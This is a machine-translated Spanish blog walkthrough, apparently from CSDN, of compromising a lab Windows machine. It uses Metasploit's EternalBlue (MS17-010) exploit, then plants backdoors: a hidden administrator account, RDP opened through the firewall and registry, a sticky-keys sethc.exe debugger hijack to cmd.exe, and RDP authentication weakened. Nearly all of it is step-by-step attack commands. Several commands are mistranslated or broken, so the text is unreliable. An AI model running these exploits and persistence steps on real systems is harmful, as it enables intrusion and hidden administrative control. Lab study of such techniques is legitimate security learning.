Mata al azul eterno de la máquina virtual y cambia la puerta trasera

Escaneo de puertos: se encuentra que puede haber una vulnerabilidad Eternal Blue (ms17_010) cuando se abre el puerto 445

nmap -sV -p- -A -v 192.168.206.129

Abrir msf

msfconsole

Buscar buscar ms17_010

Utilice el script de verificación de msf para verificar la existencia de ms17_010 

utilizar auxiliar / scanner / smb / smb_ms17_010

mostrar opciones

Configurar el script de verificación

establecer RHOSTS 192.168.206.129
ejecutar

correr

Muestra la existencia de la vulnerabilidad ms17_010

Utilice ms17_010:

use exploit / windows / smb / ms17_010_eternalblue
mostrar opciones

 Configuración: establecer rhosts 192.168.206.129

 Utilizar: ejecutar

Comando de ejecución: whoami

Obtenga permisos del sistema

Ilegible encontrado

Razón: la codificación china de indows y linux es diferente

Solución: chcp 65001

Principio: CHCP es un comando de computadora que puede mostrar o establecer el número de página de código activo.

65001 Página de códigos UTF-8

950 chino tradicional

936 GBK predeterminado en chino simplificado

437 MS-DOS Inglés americano

Construye una puerta trasera

Método 1: cree una nueva cuenta de administrador oculta, abra el escritorio remoto e inicie sesión de forma remota

Nuevo usuario oculto usuario de red shy014 $ shy014 / add

Agregar el nuevo usuario al grupo de administradores net localgroup managers shy014 $ / add

Servicio de escritorio remoto abierto 3389

REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Servidor / v fDenyTSConnections / t REG_DWORD / d 0 / f

Configurar la política de firewall

netsh advfirewall firewall agregar regla nombre = "Escritorio remoto" protocolo = TCP dir = en localport = 3389 acción = permitir
netsh es un comando de configuración de red para Windows, advfirewall firewall significa configuración avanzada de firewall, agregar regla es agregar una regla, nombre especifica el nombre de la regla , Protocol especifica el protocolo, dir especifica si jugar o entrante, localport especifica el puerto y action especifica la acción permitir.

Utilice la cuenta oculta creada para iniciar sesión de forma remota

Método 2: Secuestro de imagen de puerta trasera con clave adhesiva

REG ADD "HKLM \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ sethc.exe" / v Debugger / t REG_SZ / d "C: \ windows \ system32 \ cmd.exe"

Descripción del comando: reg add es agregar un registro al registro, seguido de la ubicación del registro, debe tenerse en cuenta aquí que HKLM es en realidad la abreviatura de HKEY_LOCAL_MACHINE. Opción de ejecución de archivo de imagen Este directorio se usa para configurar el secuestro de imágenes. Lo que se debe secuestrar es el programa de clave adhesiva sethc en el comando. Luego, use / v para especificar el nombre de la clave. El depurador del nombre de la clave es fijo, y luego use / t para Especifique el tipo, es decir, el tipo de cadena REG_SZ, y finalmente especifique el valor de la clave a través de / d, es decir, el programa reemplazado maliciosamente, es decir, nuestro cmd

Abrir escritorio remoto

1. Configure el firewall para permitir conexiones de escritorio remoto

netsh advfirewall firewall agregar regla nombre = "Escritorio remoto" protocolo = TCP dir = en puerto local = 3389 acción = permitir


netsh es un comando de configuración de red de Windows, advfirewall firewall significa configuración avanzada de firewall, agregar regla es agregar una regla, nombre especifica el nombre de la regla, protocolo especifica el protocolo, dir especifica si entrar en la batalla o de entrada, localport especifica el puerto y acción especifica la acción permitida.

2. Abra el escritorio remoto

REG ADD "HKLM \ SYSTEM \ CurrentControlSet \ Control \ TerminalServer" / v fDenyTSConnections / t REG_DWORD / D 0 / f

Configurar escritorio remoto:

1. UserAuthentication (opción de autenticación de usuario) se establece en 0

REG ADD "HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp" / v UserAuthentication / t REG_DWORD / d 0 

(Si es porque originalmente es 0, escríbelo de nuevo) 

1 Autenticar antes de la conexión a escritorio remoto

0 No se requiere autenticación antes de la conexión al escritorio remoto, y la autenticación se realiza después de conectarse a la pantalla de bloqueo del escritorio remoto

2. Securitylayer (capa de seguridad) se establece en 0

REG ADD "HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp" / v SecurityLayer / t REG_DWORD / d 0


0 significa usar el protocolo rdp para la autenticación antes de conectarse, rdp significa conexión de escritorio remoto, que puede entenderse simplemente como desactivar la autenticación. 1 significa que ambos extremos negocian la autenticación antes de conectarse. Este es el valor predeterminado. 2 es utilizar el protocolo tls para realizar

0 saltará directamente a la interfaz de la pantalla de bloqueo

1 Debe ingresar su nombre de usuario para saltar a la interfaz de la pantalla de bloqueo

prueba

Aprenda de los grandes:

Articulo de referencia:

https://blog.csdn.net/fageweiketang/article/details/88317656

 

 

 

Supongo que te gusta

Origin blog.csdn.net/qq_32393893/article/details/107689941
Recomendado
Clasificación